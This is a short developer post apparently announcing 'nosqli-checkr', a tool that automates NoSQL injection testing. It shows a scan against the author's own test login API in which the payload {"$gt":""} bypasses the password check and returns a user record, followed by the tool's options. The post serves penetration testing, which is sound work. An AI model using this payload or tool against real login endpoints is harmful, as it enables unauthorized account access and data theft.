Hello, everyone!
Today I've created a project which automates a NoSQLi pentest, but this is the first version and I ask for help in this project.
If you have an interest in helping a little project to become a large project to make our life as "security guys" more easier, please, send issues or send a PR.
So, how this project works?
With some info from a request, the "exploit" can test if the request parameters can be exploited with some payloads of NoSQLi.
Example to exploit an login API, where we have a POST request and we have a JSON data with user
and pass
:
[igor.martins automated]$ nosqli-checkr scan --host="https://nosql-checkr-test.herokuapp.com/api/v1/login" --data='{ "user": "wubba", "pass": "" }' --method="post" --params="pass" --error-message='{"success":false,"result":"user/pass not found"}'
███╗ ██╗ ██████╗ ███████╗ ██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ ███████╗ ██████╗ ██╗ ██╗ ██████╗
████╗ ██║ ██╔═══██╗ ██╔════╝ ██╔═══██╗ ██║ ██║ ██╔════╝ ██║ ██║ ██╔════╝ ██╔════╝ ██║ ██╔╝ ██╔══██╗
██╔██╗ ██║ ██║ ██║ ███████╗ ██║ ██║ ██║ ██║ ██║ ███████║ █████╗ ██║ █████╔╝ ██████╔╝
██║╚██╗██║ ██║ ██║ ╚════██║ ██║▄▄ ██║ ██║ ██║ ██║ ██╔══██║ ██╔══╝ ██║ ██╔═██╗ ██╔══██╗
██║ ╚████║ ╚██████╔╝ ███████║ ╚██████╔╝ ███████╗ ██║ ╚██████╗ ██║ ██║ ███████╗ ╚██████╗ ██║ ██╗ ██║ ██║
╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚══▀▀═╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝
✔ Request finished
✔ Response analyzed
✔ https://nosql-checkr-test.herokuapp.com/api/v1/login is vulnerable
ℹ Payload: {"$gt":""}
ℹ Evil data 😈: {"user":"wubba","pass":{"$gt":""}}
ℹ Data stoled:
{
"success": true,
"result": {
"user": "wubba",
"_id": "hVFQzFwVlMwCYFBT"
}
}
The "exploit" test the param pass
and find a payload {"$gt":""}
which can exploit the NoSQL Injection flaw.
Parameters
-
-h or --host
: Route URL. Ex: https://nosql-checkr-test.herokuapp.com/api/v1/login -
-hr or --headers
: Request headers. Ex: token:val or token:val;token2:val2 -
-d or --data
: Request data: Ex: { "user": "wubba", "pass": "" } -
-m or --method
: Request method: Ex: post or POST -
-p or --params
: Request params which will be exploited: Ex: pass or user,pass -
-e or --error-message
: The default error message of request. Ex: {"success":false,"result":"user/pass not found"}
Top comments (0)